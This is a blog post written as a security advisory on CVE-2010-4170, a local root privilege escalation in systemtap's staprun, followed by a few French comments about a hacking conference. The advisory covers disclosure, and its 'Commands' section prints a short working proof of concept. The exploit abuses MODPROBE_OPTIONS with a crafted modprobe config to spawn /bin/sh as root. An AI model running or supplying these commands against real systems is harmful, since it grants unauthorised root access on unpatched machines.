CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability

Timeline :

Vulnerability reported to vendors, by Tavis Ormandy, the 2010-11-15
Vulnerability corrected by vendors around the 2010-11-17

PoC provided by :

Tavis Ormandy

Reference(s) :

CVE-2010-4170

Affected version(s) :

Red Hat, Fedora, Debian, Ubuntu, etc.

Tested on Debian squeeze/sid with :

systemtap-runtime_1.0-2_i386.deb

Description :

It was discovered that staprun did not properly sanitize the environment before executing the modprobe command to load an additional kernel module. A local, unprivileged user could use this flaw to escalate their privileges.

Commands :

Require “systemtap-runtime” on Debian

id
printf “install uprobes /bin/sh” exploit.conf; MODPROBE_OPTIONS=”-C exploit.conf” staprun -u whatever
id

2 thoughts on “CVE-2010-4170 : systemtap Local Root Privilege Escalation Vulnerability”

tAd:

Oh, ils étaient coincés tous tes derniers articles? ;p
FYI:: Hackito Ergo Sum 2011 les 7-8-9 Avril 2011 sur Paris (http://hackitoergosum.org/)

Oui ils étaient tous coincés, constipé 🙂 Ah bah je poserai bien congé pour venir voir HES2011 Paris.
Le CFP est encore ouvert.
++

Oh, ils étaient coincés tous tes derniers articles? ;p
FYI:: Hackito Ergo Sum 2011 les 7-8-9 Avril 2011 sur Paris (http://hackitoergosum.org/)
Le CFP est encore ouvert.
++

Comments are closed.

Eric Romang Blog

aka wow on ZATAZ.com